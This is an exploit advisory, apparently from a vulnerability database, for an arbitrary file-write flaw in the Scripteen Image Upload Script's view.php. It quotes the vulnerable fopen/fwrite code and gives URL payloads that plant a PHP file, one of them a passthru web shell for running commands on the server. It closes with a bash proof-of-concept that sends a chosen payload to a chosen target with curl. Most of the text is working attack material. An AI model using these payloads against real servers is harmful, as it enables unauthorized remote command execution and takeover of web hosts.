Scripteen Image Upload script suffers from a shell upload vulnerability.
c45ff3a4cdd45439de5b57e52ca6c058
[+] Exploit Title : Scripteen İmage Upload Script Arbitrary File Injection
[+] Venedor Home Page : https://scripteen.com/
[+] Author : z3r0fy
[+] Twitter : z3r0fy
[+] Website : www.bugcontainer.gq
[+] CX Security Link : https://cxsecurity.com/issue/WLB-2019100145
[+] Description :
Due to these codes in the View.php file
$home = fopen($_GET["file"], "w"); fwrite($home, $_GET["data"]);
File can be written arbitrarily
Exploit : /app/view.php?file=shell.php&data=<?php phpinfo();?>
If you want to be made more offensive,
app/view.php?file=shell.php&data=<?php passthru($_GET["cmd"]);?>
After poc is applied, This way the command can be run on the server "shell.php?cmd="
[+] PoC :
#!/bin/bash
echo "
__________ ____ ___ _______ __
|__ /___ /| _ \ / _ \| ___\ \ / /
/ / |_ \| |_) | | | | |_ \ V /
/ /_ ___) | _ <| |_| | _| | |
/____|____/|_| \_\\___/|_| |_|
"
echo" "
echo -n "[+] TARGET : " ;read hedef
echo -n "[+] PHP Code : " ;read kod
curl $hedef/app/view.php?file=shell.php&data=$kod